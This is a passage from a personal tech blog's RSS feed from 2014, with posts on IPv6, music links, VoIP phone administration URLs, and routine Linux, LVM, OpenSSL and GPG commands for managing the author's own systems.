  4128. <p><a href="http://www.thecyborgs.it/" title="The Cyborgs - Two Men Band">The Cyborgs</a> is a two man 'elektrock' boogie band.<br>Thank you <a href="http://sat.rocks" title="Sat Rocks">Sat Rocks</a> for showing me their music :-)</p>
  4129. ]]></content:encoded>
  4130.  </item>
  4131.  
  4132.  <item>
  4133.    <title>CVS and SVN repositories moved to Git</title>
  4134.    <link>https://blog.x-way.org/Misc/2014/09/28/CVS-and-SVN-repositories-moved-to-Git.html</link>
  4135.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324227</guid>
  4136.    <dc:creator>Andreas Jaggi</dc:creator>
  4137.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4138.    <pubDate>Sun, 28 Sep 2014 20:01:00 +0000</pubDate>
  4139.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  4140.    <description><![CDATA[<p>Today I did some cleanup of my legacy infrastructure. The repositories formerly located at <a href="https://cvs.x-way.org/" title="cvs.x-way.org">cvs.x-way.org</a> and <a href="https://svn.x-way.org/" title="svn.x-way.org">svn.x-way.org</a> have been converted to <a href="http://git-scm.com" title="Git">Git</a> and are now available at <a href="https://git.x-way.org/" title="git.x-way.org">git.x-way.org</a>.</p>
  4141. <p>Also is <a href="https://git.x-way.org/" title="git.x-way.org">git.x-way.org</a> now no longer served by the old gitweb.cgi but by the fantastic <a href="https://gitbucket.github.io/" title="GitBucket">GitBucket</a> (a lightweight, self-contained <a href="https://github.com/" title="GitHub">GitHub</a> clone written in <a href="http://scala.epfl.ch" title="The Scala Programming Language">Scala</a>).</p>
  4142. ]]></description>
  4143.    <content:encoded><![CDATA[<p>Today I did some cleanup of my legacy infrastructure. The repositories formerly located at <a href="https://cvs.x-way.org/" title="cvs.x-way.org">cvs.x-way.org</a> and <a href="https://svn.x-way.org/" title="svn.x-way.org">svn.x-way.org</a> have been converted to <a href="http://git-scm.com" title="Git">Git</a> and are now available at <a href="https://git.x-way.org/" title="git.x-way.org">git.x-way.org</a>.</p>
  4144. <p>Also is <a href="https://git.x-way.org/" title="git.x-way.org">git.x-way.org</a> now no longer served by the old gitweb.cgi but by the fantastic <a href="https://gitbucket.github.io/" title="GitBucket">GitBucket</a> (a lightweight, self-contained <a href="https://github.com/" title="GitHub">GitHub</a> clone written in <a href="http://scala.epfl.ch" title="The Scala Programming Language">Scala</a>).</p>
  4145. ]]></content:encoded>
  4146.  </item>
  4147.  
  4148.  <item>
  4149.    <title>Netflix in Switzerland via IPv6</title>
  4150.    <link>https://blog.x-way.org/Networking/2014/09/23/Netflix-in-Switzerland-via-IPv6.html</link>
  4151.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324226</guid>
  4152.    <dc:creator>Andreas Jaggi</dc:creator>
  4153.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4154.    <pubDate>Tue, 23 Sep 2014 18:32:00 +0000</pubDate>
  4155.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4156.    <description><![CDATA[<p>Since last week <a href="http://www.netflix.ch/" title="Netflix">Netflix</a> is also available in Switzerland. The future has arrived one could say.<br>
  4157. Not only gives this easy access to TV shows and movies but also is this access provided via IPv6.</p>
  4158.  
  4159. <p>As you can see on the graph below, this brings IPv6 out of slumber and into primetime :-)<br>
  4160. Swiss providers are probably seeing quite an increase in IPv6 traffic this month.</p>
  4161.  
  4162. <p><img alt="Netflix IPv6 traffic" src="https://blog.x-way.org/images/netflix_ipv6.gif" width="500" height="170"></p>
  4163. ]]></description>
  4164.    <content:encoded><![CDATA[<p>Since last week <a href="http://www.netflix.ch/" title="Netflix">Netflix</a> is also available in Switzerland. The future has arrived one could say.<br>
  4165. Not only gives this easy access to TV shows and movies but also is this access provided via IPv6.</p>
  4166.  
  4167. <p>As you can see on the graph below, this brings IPv6 out of slumber and into primetime :-)<br>
  4168. Swiss providers are probably seeing quite an increase in IPv6 traffic this month.</p>
  4169.  
  4170. <p><img alt="Netflix IPv6 traffic" src="https://blog.x-way.org/images/netflix_ipv6.gif" width="500" height="170"></p>
  4171. ]]></content:encoded>
  4172.  </item>
  4173.  
  4174.  <item>
  4175.    <title>Octave Minds</title>
  4176.    <link>https://blog.x-way.org/Music/2014/09/18/Octave-Minds.html</link>
  4177.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324225</guid>
  4178.    <dc:creator>Andreas Jaggi</dc:creator>
  4179.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4180.    <pubDate>Thu, 18 Sep 2014 11:42:00 +0000</pubDate>
  4181.    <category domain="https://blog.x-way.org/Music">Music</category>
  4182.    <description><![CDATA[<p><a href="https://youtu.be/53zHCEFyN98" title="Octave Minds - Anthem - YouTube">Octave Minds - Anthem</a></p>
  4183. <p><a href="http://octaveminds.com" title="OCTAVE MINDS">Octave Minds</a> (<a href="http://www.reizbombardement.de" title="reizbombardement.de">via</a>)</p>
  4184. ]]></description>
  4185.    <content:encoded><![CDATA[<p><a href="https://youtu.be/53zHCEFyN98" title="Octave Minds - Anthem - YouTube">Octave Minds - Anthem</a></p>
  4186. <p><a href="http://octaveminds.com" title="OCTAVE MINDS">Octave Minds</a> (<a href="http://www.reizbombardement.de" title="reizbombardement.de">via</a>)</p>
  4187. ]]></content:encoded>
  4188.  </item>
  4189.  
  4190.  <item>
  4191.    <title>Fancy blog statistics</title>
  4192.    <link>https://blog.x-way.org/Webdesign/2014/09/12/Fancy-blog-statistics.html</link>
  4193.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324224</guid>
  4194.    <dc:creator>Andreas Jaggi</dc:creator>
  4195.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4196.    <pubDate>Fri, 12 Sep 2014 14:48:00 +0000</pubDate>
  4197.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  4198.    <description><![CDATA[<p><a href="https://blog.x-way.org/about.html" title="x-log: About">The about page</a> now features some fancy blog statistics, check it out :-)</p>
  4199. <p>The statistics are created with the help of <a href="https://cal-heatmap.com/" title="Cal-Heatmap">Cal-Heatmap</a> which allows to easily create calendar heatmaps similar to the activity heatmap of GitHub.</p>
  4200. <p><b>Update:</b> couldn't stop playing around and thus added another chart, this time with the help of <a href="http://c3js.org" title="C3.js | D3-based reusable chart library">C3.js</a> (a <a href="http://d3js.org" title="D3.js - Data-Driven Documents">D3.js</a> based reusable chart library).</p>
  4201. ]]></description>
  4202.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/about.html" title="x-log: About">The about page</a> now features some fancy blog statistics, check it out :-)</p>
  4203. <p>The statistics are created with the help of <a href="https://cal-heatmap.com/" title="Cal-Heatmap">Cal-Heatmap</a> which allows to easily create calendar heatmaps similar to the activity heatmap of GitHub.</p>
  4204. <p><b>Update:</b> couldn't stop playing around and thus added another chart, this time with the help of <a href="http://c3js.org" title="C3.js | D3-based reusable chart library">C3.js</a> (a <a href="http://d3js.org" title="D3.js - Data-Driven Documents">D3.js</a> based reusable chart library).</p>
  4205. ]]></content:encoded>
  4206.  </item>
  4207.  
  4208.  <item>
  4209.    <title>Sipura/Linksys/Cisco SPA901 SPA3102 reboot phone</title>
  4210.    <link>https://blog.x-way.org/Networking/2014/09/04/Sipura-Linksys-Cisco-SPA901-SPA3102-reboot-phone.html</link>
  4211.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324223</guid>
  4212.    <dc:creator>Andreas Jaggi</dc:creator>
  4213.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4214.    <pubDate>Thu, 04 Sep 2014 10:42:00 +0000</pubDate>
  4215.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4216.    <description><![CDATA[<p>SPA901 and SPA3102 phones can be rebooted by calling the following URL (which triggers an automatic config resync after the reboot):</p>
  4217. <pre>http://&lt;PHONEIP&gt;/admin/reboot</pre>
  4218. ]]></description>
  4219.    <content:encoded><![CDATA[<p>SPA901 and SPA3102 phones can be rebooted by calling the following URL (which triggers an automatic config resync after the reboot):</p>
  4220. <pre>http://&lt;PHONEIP&gt;/admin/reboot</pre>
  4221. ]]></content:encoded>
  4222.  </item>
  4223.  
  4224.  <item>
  4225.    <title>Sipura/Linksys/Cisco SPA901 SPA3102 download current configuration</title>
  4226.    <link>https://blog.x-way.org/Networking/2014/08/30/Sipura-Linksys-Cisco-SPA901-SPA3102-download-current-configuration.html</link>
  4227.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324222</guid>
  4228.    <dc:creator>Andreas Jaggi</dc:creator>
  4229.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4230.    <pubDate>Sat, 30 Aug 2014 22:16:00 +0000</pubDate>
  4231.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4232.    <description><![CDATA[<p>The current configuration of an SPA901 phone can be downloaded like this:</p>
  4233. <pre>http://&lt;PHONEIP&gt;/admin/spacfg.xml</pre>
  4234. <p>For SPA3102 devices the URL is different:</p>
  4235. <pre>http://&lt;PHONEIP&gt;/admin/config.xml</pre>
  4236. ]]></description>
  4237.    <content:encoded><![CDATA[<p>The current configuration of an SPA901 phone can be downloaded like this:</p>
  4238. <pre>http://&lt;PHONEIP&gt;/admin/spacfg.xml</pre>
  4239. <p>For SPA3102 devices the URL is different:</p>
  4240. <pre>http://&lt;PHONEIP&gt;/admin/config.xml</pre>
  4241. ]]></content:encoded>
  4242.  </item>
  4243.  
  4244.  <item>
  4245.    <title>Native IPv6</title>
  4246.    <link>https://blog.x-way.org/Networking/2014/07/25/Native-IPv6.html</link>
  4247.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324221</guid>
  4248.    <dc:creator>Andreas Jaggi</dc:creator>
  4249.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4250.    <pubDate>Fri, 25 Jul 2014 08:08:00 +0000</pubDate>
  4251.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4252.    <description><![CDATA[<p>Yesterday I switched our DSL Link to <a href="http://www.green.ch/" title="www.green.ch">green.ch</a>. Now we not only have a higher bandwidth (thanks to VDSL) but also native IPv6 connectivity!<br>Especially nice is that it all works out of the box. After plugging in the pre-configured FritzBox, it automatically gets an IPv6 prefix via Prefix Delegation and announces it to the clients in the LAN.</p>
  4253. <pre>08:05 [ aj @ actuarius : ~ ] % mtr -rc5 www.open.ch
  4254. Start: Fri Jul 25 08:06:42 2014
  4255. HOST: actuarius.fritz.box         Loss%   Snt   Last   Avg  Best  Wrst StDev
  4256.  1.|-- fritz.box                  0.0%     5    0.8   0.8   0.7   0.8   0.0
  4257.  2.|-- 2a01:2a8::121              0.0%     5    8.6   8.7   8.5   9.2   0.0
  4258.  3.|-- 2a01:2a8:0:5a::1           0.0%     5    8.4   8.2   8.0   8.4   0.0
  4259.  4.|-- 2a01:2a8:1:7::4            0.0%     5    8.1   8.6   8.1   9.6   0.0
  4260.  5.|-- 2a00:db0:9:a06::5          0.0%     5    8.8   8.6   8.3   8.8   0.0
  4261.  6.|-- www.open.ch                0.0%     5    8.9   8.7   8.6   8.9   0.0</pre>
  4262. ]]></description>
  4263.    <content:encoded><![CDATA[<p>Yesterday I switched our DSL Link to <a href="http://www.green.ch/" title="www.green.ch">green.ch</a>. Now we not only have a higher bandwidth (thanks to VDSL) but also native IPv6 connectivity!<br>Especially nice is that it all works out of the box. After plugging in the pre-configured FritzBox, it automatically gets an IPv6 prefix via Prefix Delegation and announces it to the clients in the LAN.</p>
  4264. <pre>08:05 [ aj @ actuarius : ~ ] % mtr -rc5 www.open.ch
  4265. Start: Fri Jul 25 08:06:42 2014
  4266. HOST: actuarius.fritz.box         Loss%   Snt   Last   Avg  Best  Wrst StDev
  4267.  1.|-- fritz.box                  0.0%     5    0.8   0.8   0.7   0.8   0.0
  4268.  2.|-- 2a01:2a8::121              0.0%     5    8.6   8.7   8.5   9.2   0.0
  4269.  3.|-- 2a01:2a8:0:5a::1           0.0%     5    8.4   8.2   8.0   8.4   0.0
  4270.  4.|-- 2a01:2a8:1:7::4            0.0%     5    8.1   8.6   8.1   9.6   0.0
  4271.  5.|-- 2a00:db0:9:a06::5          0.0%     5    8.8   8.6   8.3   8.8   0.0
  4272.  6.|-- www.open.ch                0.0%     5    8.9   8.7   8.6   8.9   0.0</pre>
  4273. ]]></content:encoded>
  4274.  </item>
  4275.  
  4276.  <item>
  4277.    <title>12 Years</title>
  4278.    <link>https://blog.x-way.org/Misc/2014/06/03/12-Years.html</link>
  4279.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324220</guid>
  4280.    <dc:creator>Andreas Jaggi</dc:creator>
  4281.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4282.    <pubDate>Tue, 03 Jun 2014 08:50:00 +0000</pubDate>
  4283.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  4284.    <description><![CDATA[<p>12 years ago I started this weblog with a link to <a href="http://www.2advanced.com/" title="www.2advanced.com">www.2advanced.com</a>.<br>
  4285. It's now 555 posts later and I think what is most unexpected (besides that this weblog is still existing 12 years later), is that this first link from my first post is still valid (and still pointing to some Flash-only website...).</p>
  4286. <p>So far this weblog has survived 2 different domains, 3 different servers, multiple versions of a self-made blogging-engine, about 6 different layout designs, a database-crash, recovery via archive.org and a migration to Jekyll.</p>
  4287. <p>No guarantee that it will last another 12 years, but for the meantime: Cheers, and enjoy the ride!</p>
  4288. <p><img src="https://blog.x-way.org/images/12_years_cheers.jpg" width="333" height="398" alt="12 years, Cheers!"></p>
  4289. ]]></description>
  4290.    <content:encoded><![CDATA[<p>12 years ago I started this weblog with a link to <a href="http://www.2advanced.com/" title="www.2advanced.com">www.2advanced.com</a>.<br>
  4291. It's now 555 posts later and I think what is most unexpected (besides that this weblog is still existing 12 years later), is that this first link from my first post is still valid (and still pointing to some Flash-only website...).</p>
  4292. <p>So far this weblog has survived 2 different domains, 3 different servers, multiple versions of a self-made blogging-engine, about 6 different layout designs, a database-crash, recovery via archive.org and a migration to Jekyll.</p>
  4293. <p>No guarantee that it will last another 12 years, but for the meantime: Cheers, and enjoy the ride!</p>
  4294. <p><img src="https://blog.x-way.org/images/12_years_cheers.jpg" width="333" height="398" alt="12 years, Cheers!"></p>
  4295. ]]></content:encoded>
  4296.  </item>
  4297.  
  4298.  <item>
  4299.    <title>It's alive!</title>
  4300.    <link>https://blog.x-way.org/Networking/2014/05/28/Its-alive.html</link>
  4301.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324219</guid>
  4302.    <dc:creator>Andreas Jaggi</dc:creator>
  4303.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4304.    <pubDate>Wed, 28 May 2014 23:19:00 +0000</pubDate>
  4305.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4306.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/Telefon_Modell_50-SIP.jpg" width="520" height="390" alt="Wandtelefon Modell 50 with SIP ATA"></p>
  4307. <p>Wandtelefon Modell 50 from January 1970 now talks SIP (and it only took two converters, a bit of cable-fiddling and some luck :-)</p>
  4308. ]]></description>
  4309.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/Telefon_Modell_50-SIP.jpg" width="520" height="390" alt="Wandtelefon Modell 50 with SIP ATA"></p>
  4310. <p>Wandtelefon Modell 50 from January 1970 now talks SIP (and it only took two converters, a bit of cable-fiddling and some luck :-)</p>
  4311. ]]></content:encoded>
  4312.  </item>
  4313.  
  4314.  <item>
  4315.    <title>Stop BÜPF!</title>
  4316.    <link>https://blog.x-way.org/Networking/2014/05/22/Stop-BUPF.html</link>
  4317.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324218</guid>
  4318.    <dc:creator>Andreas Jaggi</dc:creator>
  4319.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4320.    <pubDate>Thu, 22 May 2014 19:55:00 +0000</pubDate>
  4321.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4322.    <description><![CDATA[<p><a href="https://web.archive.org/web/20160818210307/http://stopbuepf.ch/" title="Stop BÜPF! (archive.org)"><img src="https://blog.x-way.org/images/stopbuepf.png" width="300" height="168" alt="Stop BÜPF!"></a></p>
  4323. ]]></description>
  4324.    <content:encoded><![CDATA[<p><a href="https://web.archive.org/web/20160818210307/http://stopbuepf.ch/" title="Stop BÜPF! (archive.org)"><img src="https://blog.x-way.org/images/stopbuepf.png" width="300" height="168" alt="Stop BÜPF!"></a></p>
  4325. ]]></content:encoded>
  4326.  </item>
  4327.  
  4328.  <item>
  4329.    <title>Load PKCS#8 SSH key files in Mac OS X 10.9</title>
  4330.    <link>https://blog.x-way.org/Networking/2014/04/18/Load-PKCS8-SSH-key-files-in-Mac-OS-X-10-9.html</link>
  4331.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324217</guid>
  4332.    <dc:creator>Andreas Jaggi</dc:creator>
  4333.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4334.    <pubDate>Fri, 18 Apr 2014 14:36:00 +0000</pubDate>
  4335.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4336.    <description><![CDATA[<p>There is currently a bug in Mac OS X 10.9 which causes that ssh-add is no longer able to read SSH key files in PKCS#8 format.</p>
  4337. <p>Fortunately ssh-add still reads PKCS#8 keys when provided through STDIN and openssl is able to decrypt PKCS#8 keys.</p>
  4338. <p>Thus the following workaround so that PKCS#8 SSH keys can be loaded again:</p>
  4339. <pre>
  4340. openssl pkcs8 -in ~/.ssh/id_rsa | ssh-add -
  4341. </pre>
  4342. ]]></description>
  4343.    <content:encoded><![CDATA[<p>There is currently a bug in Mac OS X 10.9 which causes that ssh-add is no longer able to read SSH key files in PKCS#8 format.</p>
  4344. <p>Fortunately ssh-add still reads PKCS#8 keys when provided through STDIN and openssl is able to decrypt PKCS#8 keys.</p>
  4345. <p>Thus the following workaround so that PKCS#8 SSH keys can be loaded again:</p>
  4346. <pre>
  4347. openssl pkcs8 -in ~/.ssh/id_rsa | ssh-add -
  4348. </pre>
  4349. ]]></content:encoded>
  4350.  </item>
  4351.  
  4352.  <item>
  4353.    <title>Facebook: The Road To IPv6</title>
  4354.    <link>https://blog.x-way.org/Networking/2014/03/23/Facebook-The-Road-To-IPv6.html</link>
  4355.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324216</guid>
  4356.    <dc:creator>Andreas Jaggi</dc:creator>
  4357.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4358.    <pubDate>Sun, 23 Mar 2014 15:09:00 +0000</pubDate>
  4359.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4360.    <description><![CDATA[<p>Great presentation by <a href="https://www.facebook.com/ps" title="Paul Saab | Facebook">Paul Saab</a> about the IPv6 introduction at Facebook: <a href="https://blog.x-way.org/stuff/Paul.Saab.Facebook.The.Road.To.IPv6.pdf" title="Paul Saab - Facebook: The Road To IPv6">The Road To IPv6</a></p>
  4361. <p>(<a href="https://news.ycombinator.com/item?id=7448752" title="Hacker News">via</a>)</p>
  4362. ]]></description>
  4363.    <content:encoded><![CDATA[<p>Great presentation by <a href="https://www.facebook.com/ps" title="Paul Saab | Facebook">Paul Saab</a> about the IPv6 introduction at Facebook: <a href="https://blog.x-way.org/stuff/Paul.Saab.Facebook.The.Road.To.IPv6.pdf" title="Paul Saab - Facebook: The Road To IPv6">The Road To IPv6</a></p>
  4364. <p>(<a href="https://news.ycombinator.com/item?id=7448752" title="Hacker News">via</a>)</p>
  4365. ]]></content:encoded>
  4366.  </item>
  4367.  
  4368.  <item>
  4369.    <title>Moving a KVM guest to another machine</title>
  4370.    <link>https://blog.x-way.org/Linux/2014/02/13/Moving-a-KVM-guest-to-another-machine.html</link>
  4371.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324214</guid>
  4372.    <dc:creator>Andreas Jaggi</dc:creator>
  4373.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4374.    <pubDate>Thu, 13 Feb 2014 20:02:00 +0000</pubDate>
  4375.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4376.    <description><![CDATA[<ol>
  4377. <li>Properly shutdown the guest: <pre>guest# poweroff</pre></li>
  4378. <li>Create an LVM volume of the same size on the new machine: <pre>newmachine# lvcreate -L 120G -n myguest myvolgroup</pre></li>
  4379. <li>Copy the disk from the old machine over to the new one: <pre>oldmachine# dd if=/dev/vg_foo/lv_bar | ssh newmachine dd of=/dev/volgroup/myguest</pre></li>
  4380. <li>Wait for the transfer to complete (on a 100Mbit/s connection it took about 3.5 hours to transfer the 120GB).</li>
  4381. <li>Copy /etc/libvirt/qemu/myguest.xml from the old machine over to the new machine and adapt the LVM path for the disk.</li>
  4382. <li>Reload the libvirt configuration: <pre>newmachine# /etc/init.d/libvirt-bin reload</pre></li>
  4383. <li>Start up the guest on the new machine: <pre>newmachine# virsh start myguest</pre></li>
  4384. </ol>
  4385. ]]></description>
  4386.    <content:encoded><![CDATA[<ol>
  4387. <li>Properly shutdown the guest: <pre>guest# poweroff</pre></li>
  4388. <li>Create an LVM volume of the same size on the new machine: <pre>newmachine# lvcreate -L 120G -n myguest myvolgroup</pre></li>
  4389. <li>Copy the disk from the old machine over to the new one: <pre>oldmachine# dd if=/dev/vg_foo/lv_bar | ssh newmachine dd of=/dev/volgroup/myguest</pre></li>
  4390. <li>Wait for the transfer to complete (on a 100Mbit/s connection it took about 3.5 hours to transfer the 120GB).</li>
  4391. <li>Copy /etc/libvirt/qemu/myguest.xml from the old machine over to the new machine and adapt the LVM path for the disk.</li>
  4392. <li>Reload the libvirt configuration: <pre>newmachine# /etc/init.d/libvirt-bin reload</pre></li>
  4393. <li>Start up the guest on the new machine: <pre>newmachine# virsh start myguest</pre></li>
  4394. </ol>
  4395. ]]></content:encoded>
  4396.  </item>
  4397.  
  4398.  <item>
  4399.    <title>Shrinking a LVM root partition</title>
  4400.    <link>https://blog.x-way.org/Linux/2014/02/13/Shrinking-a-LVM-root-partition.html</link>
  4401.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324215</guid>
  4402.    <dc:creator>Andreas Jaggi</dc:creator>
  4403.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4404.    <pubDate>Thu, 13 Feb 2014 19:02:00 +0000</pubDate>
  4405.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4406.    <description><![CDATA[<ol>
  4407. <li>Boot from a helper system and get a root shell (I used the rescue mode of the Debian installer)</li>
  4408. <li>Check the filesystem of the partition to resize: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  4409. <li>Resize the filesystem (make it a bit smaller than the target size, to have a safety margin when resizing the logical volume): <pre>resize2fs /dev/vg_foo/lv_bar 180G</pre></li>
  4410. <li>Reduce size of the logical volume: <pre>lvreduce -L 190G /dev/vg_foo/lv_bar</pre></li>
  4411. <li>Grow the filesystem to the new size of the logical volume: <pre>resize2fs /dev/vg_foo/lv_bar</pre></li>
  4412. <li>For good measure run another filesystem check: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  4413. </ol>
  4414. ]]></description>
  4415.    <content:encoded><![CDATA[<ol>
  4416. <li>Boot from a helper system and get a root shell (I used the rescue mode of the Debian installer)</li>
  4417. <li>Check the filesystem of the partition to resize: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  4418. <li>Resize the filesystem (make it a bit smaller than the target size, to have a safety margin when resizing the logical volume): <pre>resize2fs /dev/vg_foo/lv_bar 180G</pre></li>
  4419. <li>Reduce size of the logical volume: <pre>lvreduce -L 190G /dev/vg_foo/lv_bar</pre></li>
  4420. <li>Grow the filesystem to the new size of the logical volume: <pre>resize2fs /dev/vg_foo/lv_bar</pre></li>
  4421. <li>For good measure run another filesystem check: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  4422. </ol>
  4423. ]]></content:encoded>
  4424.  </item>
  4425.  
  4426.  <item>
  4427.    <title>Verify that an SSL certificate matches the private key</title>
  4428.    <link>https://blog.x-way.org/Networking/2014/01/19/Verify-that-an-SSL-certificate-matches-the-private-key.html</link>
  4429.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324213</guid>
  4430.    <dc:creator>Andreas Jaggi</dc:creator>
  4431.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4432.    <pubDate>Sun, 19 Jan 2014 13:32:00 +0000</pubDate>
  4433.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4434.    <description><![CDATA[<p>When renewing certificates it is a good idea to verify that the newly installed SSL certificate matches the newly installed private key (eg. to make sure no mixup between the new and old files occurred).<br>This can be done by comparing the modulus of the two files:</p>
  4435. <pre>openssl x509 -in &lt;certificatefile&gt; -noout -modulus|sha1sum
  4436. openssl rsa -in &lt;privatekeyfile&gt; -noout -modulus|sha1sum</pre>
  4437. ]]></description>
  4438.    <content:encoded><![CDATA[<p>When renewing certificates it is a good idea to verify that the newly installed SSL certificate matches the newly installed private key (eg. to make sure no mixup between the new and old files occurred).<br>This can be done by comparing the modulus of the two files:</p>
  4439. <pre>openssl x509 -in &lt;certificatefile&gt; -noout -modulus|sha1sum
  4440. openssl rsa -in &lt;privatekeyfile&gt; -noout -modulus|sha1sum</pre>
  4441. ]]></content:encoded>
  4442.  </item>
  4443.  
  4444.  <item>
  4445.    <title>Sipura/Linksys/Cisco SPA901 Provisioning and Upgrade</title>
  4446.    <link>https://blog.x-way.org/Networking/2014/01/12/Sipura-Linksys-Cisco-SPA901-Provisioning-and-Upgrade.html</link>
  4447.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324212</guid>
  4448.    <dc:creator>Andreas Jaggi</dc:creator>
  4449.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4450.    <pubDate>Sun, 12 Jan 2014 21:02:00 +0000</pubDate>
  4451.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4452.    <description><![CDATA[<p>Loading the configuration from http://config.server/configfile.xml (provisioning has to be enabled on the phone):</p>
  4453. <pre>http://&lt;PHONEIP&gt;/admin/resync?http://config.server/configfile.xml</pre>
  4454. <p>Upgrading the firmware with the image from http://upgrade.server/firmware.bin:</p>
  4455. <pre>http://&lt;PHONEIP&gt;/upgrade?http://upgrade.server/firmware.bin</pre>
  4456. ]]></description>
  4457.    <content:encoded><![CDATA[<p>Loading the configuration from http://config.server/configfile.xml (provisioning has to be enabled on the phone):</p>
  4458. <pre>http://&lt;PHONEIP&gt;/admin/resync?http://config.server/configfile.xml</pre>
  4459. <p>Upgrading the firmware with the image from http://upgrade.server/firmware.bin:</p>
  4460. <pre>http://&lt;PHONEIP&gt;/upgrade?http://upgrade.server/firmware.bin</pre>
  4461. ]]></content:encoded>
  4462.  </item>
  4463.  
  4464.  <item>
  4465.    <title>Publish GPG Keys in DNS</title>
  4466.    <link>https://blog.x-way.org/Networking/2014/01/01/Publish-GPG-Keys-in-DNS.html</link>
  4467.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324211</guid>
  4468.    <dc:creator>Andreas Jaggi</dc:creator>
  4469.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4470.    <pubDate>Wed, 01 Jan 2014 13:52:00 +0000</pubDate>
  4471.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4472.    <description><![CDATA[<p>Create the PKA DNS record:</p>
  4473. <pre># <b>localpart=andreas domain=jaggi.info url=http://andreas-jaggi.ch/1C6AC951.asc</b>
  4474. # <b>LANG=C gpg --fingerprint ${localpart}@${domain}|awk -v local=$localpart -v domain=$domain -v url=$url \
  4475. '/fingerprint/{printf("%s._pka.%s. TXT \"v=pka1;fpr=%s;uri=%s\"\n",local,domain,$4$5$6$7$8$9$10$11$12$13,url)}'</b>
  4476. andreas._pka.jaggi.info. TXT "v=pka1;fpr=1073501542F38352FC85788207A32EAB1C6AC951;uri=http://andreas-jaggi.ch/1C6AC951.asc"</pre>
  4477. <p>Test DNS resolution:</p>
  4478. <pre># <b>dig +short -t txt andreas._pka.jaggi.info.</b>
  4479. "v=pka1\;fpr=1388580990F38352FC85788207A32EAB1C6AC951\;uri=http://andreas-jaggi.ch/1C6AC951.asc"</pre>
  4480. <p>Test with GPG:</p>
  4481. <pre># <b>gpg --auto-key-locate pka -ea -r ${localpart}@${domain}</b></pre>
  4482. <p>
  4483. Detailed explanation of the different DNS publication mechanisms for PGP Keys:<br><a href="http://www.gushi.org/make-dns-cert/HOWTO.html" title="Publishing PGP Keys in DNS">Publishing PGP Keys in DNS</a></p>
  4484. <p>(<a href="https://grepular.com/Publishing_PGP_Keys_in_the_DNS" title="">via</a>)</p>
  4485. ]]></description>
  4486.    <content:encoded><![CDATA[<p>Create the PKA DNS record:</p>
  4487. <pre># <b>localpart=andreas domain=jaggi.info url=http://andreas-jaggi.ch/1C6AC951.asc</b>
  4488. # <b>LANG=C gpg --fingerprint ${localpart}@${domain}|awk -v local=$localpart -v domain=$domain -v url=$url \
